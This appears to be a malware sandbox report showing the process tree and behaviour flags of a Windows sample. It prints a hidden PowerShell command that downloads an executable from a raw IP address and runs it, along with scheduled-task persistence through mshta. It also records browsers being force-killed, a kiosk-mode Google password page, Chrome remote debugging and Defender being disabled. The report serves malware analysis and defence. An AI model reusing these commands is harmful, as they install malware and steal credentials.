description pid Process procid_target PID 2044 wrote to memory of 2584 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2044 wrote to memory of 2584 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2044 wrote to memory of 2584 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2044 wrote to memory of 2584 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2044 wrote to memory of 1636 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2044 wrote to memory of 1636 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2044 wrote to memory of 1636 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2044 wrote to memory of 1636 2044 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2584 wrote to memory of 2352 2584 cmd.exe 33 PID 2584 wrote to memory of 2352 2584 cmd.exe 33 PID 2584 wrote to memory of 2352 2584 cmd.exe 33 PID 2584 wrote to memory of 2352 2584 cmd.exe 33 PID 1636 wrote to memory of 1980 1636 mshta.exe 34 PID 1636 wrote to memory of 1980 1636 mshta.exe 34 PID 1636 wrote to memory of 1980 1636 mshta.exe 34 PID 1636 wrote to memory of 1980 1636 mshta.exe 34 PID 1980 wrote to memory of 2904 1980 powershell.exe 36 PID 1980 wrote to memory of 2904 1980 powershell.exe 36 PID 1980 wrote to memory of 2904 1980 powershell.exe 36 PID 1980 wrote to memory of 2904 1980 powershell.exe 36 PID 2904 wrote to memory of 2992 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 38 PID 2904 wrote to memory of 2992 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 38 PID 2904 wrote to memory of 2992 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 38 PID 2904 wrote to memory of 2992 2904 TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE 38 PID 2992 wrote to memory of 1956 2992 rapes.exe 40 PID 2992 wrote to memory of 1956 2992 rapes.exe 40 PID 2992 wrote to memory of 1956 2992 rapes.exe 40 PID 2992 wrote to memory of 1956 2992 rapes.exe 40 PID 1956 wrote to memory of 2964 1956 7ba969f541.exe 41 PID 1956 wrote to memory of 2964 1956 7ba969f541.exe 41 PID 1956 wrote to memory of 2964 1956 7ba969f541.exe 41 PID 1956 wrote to memory of 2964 1956 7ba969f541.exe 41 PID 1956 wrote to memory of 2996 1956 7ba969f541.exe 42 PID 1956 wrote to memory of 2996 1956 7ba969f541.exe 42 PID 1956 wrote to memory of 2996 1956 7ba969f541.exe 42 PID 1956 wrote to memory of 2996 1956 7ba969f541.exe 42 PID 2964 wrote to memory of 2852 2964 cmd.exe 44 PID 2964 wrote to memory of 2852 2964 cmd.exe 44 PID 2964 wrote to memory of 2852 2964 cmd.exe 44 PID 2964 wrote to memory of 2852 2964 cmd.exe 44 PID 2996 wrote to memory of 2748 2996 mshta.exe 45 PID 2996 wrote to memory of 2748 2996 mshta.exe 45 PID 2996 wrote to memory of 2748 2996 mshta.exe 45 PID 2996 wrote to memory of 2748 2996 mshta.exe 45 PID 2748 wrote to memory of 1124 2748 powershell.exe 47 PID 2748 wrote to memory of 1124 2748 powershell.exe 47 PID 2748 wrote to memory of 1124 2748 powershell.exe 47 PID 2748 wrote to memory of 1124 2748 powershell.exe 47 PID 2992 wrote to memory of 864 2992 rapes.exe 48 PID 2992 wrote to memory of 864 2992 rapes.exe 48 PID 2992 wrote to memory of 864 2992 rapes.exe 48 PID 2992 wrote to memory of 864 2992 rapes.exe 48 PID 864 wrote to memory of 1968 864 cmd.exe 50 PID 864 wrote to memory of 1968 864 cmd.exe 50 PID 864 wrote to memory of 1968 864 cmd.exe 50 PID 864 wrote to memory of 1968 864 cmd.exe 50 PID 864 wrote to memory of 2400 864 cmd.exe 51 PID 864 wrote to memory of 2400 864 cmd.exe 51 PID 864 wrote to memory of 2400 864 cmd.exe 51 PID 864 wrote to memory of 2400 864 cmd.exe 51 PID 2400 wrote to memory of 2504 2400 cmd.exe 52 PID 2400 wrote to memory of 2504 2400 cmd.exe 52 PID 2400 wrote to memory of 2504 2400 cmd.exe 52 PID 2400 wrote to memory of 2504 2400 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn mHKzNmaqD7o /tr "mshta C:\Users\Admin\AppData\Local\Temp\NgQDGBaaT.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn mHKzNmaqD7o /tr "mshta C:\Users\Admin\AppData\Local\Temp\NgQDGBaaT.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\NgQDGBaaT.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE"C:\Users\Admin\AppData\Local\TempJ6ISIVLP2VAEPWVQIOEOXTBQ5FZKK7CH.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\10318740101\7ba969f541.exe"C:\Users\Admin\AppData\Local\Temp\10318740101\7ba969f541.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn VVarSmaMCrf /tr "mshta C:\Users\Admin\AppData\Local\Temp\NjRMGpOps.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn VVarSmaMCrf /tr "mshta C:\Users\Admin\AppData\Local\Temp\NjRMGpOps.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2852
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\NjRMGpOps.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Local\TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE"C:\Users\Admin\AppData\Local\TempUEZGZYBGAIYFHQJUHWMTIMITTGVXAXCB.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1124
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "sOE0gmaTtGk" /tr "mshta \"C:\Temp\VuEkvWiQP.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:768
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\VuEkvWiQP.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"6⤵
- Executes dropped EXE
PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\10319000101\9daa8ce51a.exe"C:\Users\Admin\AppData\Local\Temp\10319000101\9daa8ce51a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\10319010101\8045970a06.exe"C:\Users\Admin\AppData\Local\Temp\10319010101\8045970a06.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\10319020101\770a8152e2.exe"C:\Users\Admin\AppData\Local\Temp\10319020101\770a8152e2.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2228 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:1972
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1636 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.0.1654265577\278607147" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1224 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {68366ee0-a3fc-4b4b-a07c-f0812fce4acd} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 1308 7ef8058 gpu9⤵PID:1276
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.1.111702695\1271134152" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {486706fc-0790-4704-9f75-dd8ae8a12247} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 1496 d71b58 socket9⤵PID:2700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.2.1770638027\2100678984" -childID 1 -isForBrowser -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a4f604c-cf1f-43bb-abbf-dca932dc1cb5} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 2088 7e5cd58 tab9⤵PID:2184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.3.1823139583\212024942" -childID 2 -isForBrowser -prefsHandle 2744 -prefMapHandle 2740 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ec96e9-5104-441c-b2a3-452e25b0e4de} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 2756 d61b58 tab9⤵PID:1788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.4.1358010473\85317873" -childID 3 -isForBrowser -prefsHandle 3608 -prefMapHandle 3624 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7db983cd-ba8d-420d-93dd-a3575acf8651} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 3564 1b6f1a58 tab9⤵PID:2564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.5.585282368\1201963276" -childID 4 -isForBrowser -prefsHandle 1132 -prefMapHandle 3644 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f5e4e68-4e87-40d1-895b-86ea767104a3} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 1128 83c6458 tab9⤵PID:3024
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1636.6.2037858193\609148126" -childID 5 -isForBrowser -prefsHandle 3980 -prefMapHandle 3984 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8979a3c-b5a8-4efc-bb15-497a8d3c4518} 1636 "\\.\pipe\gecko-crash-server-pipe.1636" 3968 1e58e758 tab9⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10319030101\e9ccb8daa1.exe"C:\Users\Admin\AppData\Local\Temp\10319030101\e9ccb8daa1.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\10319040101\5d0ced5341.exe"C:\Users\Admin\AppData\Local\Temp\10319040101\5d0ced5341.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3240 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4e39758,0x7fef4e39768,0x7fef4e397788⤵PID:4056
-
-
C:\Windows\system32\ctfmon.exectfmon.exe8⤵PID:3184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:28⤵PID:3256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1436 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:2804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:3264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2316 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1096 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:28⤵PID:1496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3312 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3488 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:3924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3508 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:3916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3536 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3840 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:3984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3532 --field-trial-handle=1352,i,4926199506406607170,2539598913832242125,131072 /prefetch:88⤵PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\y58gd" & exit7⤵PID:3956
-
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- Delays execution with timeout.exe
PID:3200
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10319050101\f58b0dd405.exe"C:\Users\Admin\AppData\Local\Temp\10319050101\f58b0dd405.exe"6⤵
- Executes dropped EXE
PID:4040 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4040 -s 367⤵
- Loads dropped DLL
PID:2680
-
-
-
C:\Users\Admin\AppData\Local\Temp\10319060101\Jq0hGDZ.exe"C:\Users\Admin\AppData\Local\Temp\10319060101\Jq0hGDZ.exe"6⤵PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\10319070101\cUpXaxB.exe"C:\Users\Admin\AppData\Local\Temp\10319070101\cUpXaxB.exe"6⤵PID:3868
-
-
C:\Users\Admin\AppData\Local\Temp\10319080101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10319080101\zx4PJh6.exe"6⤵PID:3436
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat7⤵PID:3988
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:3740
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵PID:3980
-
-
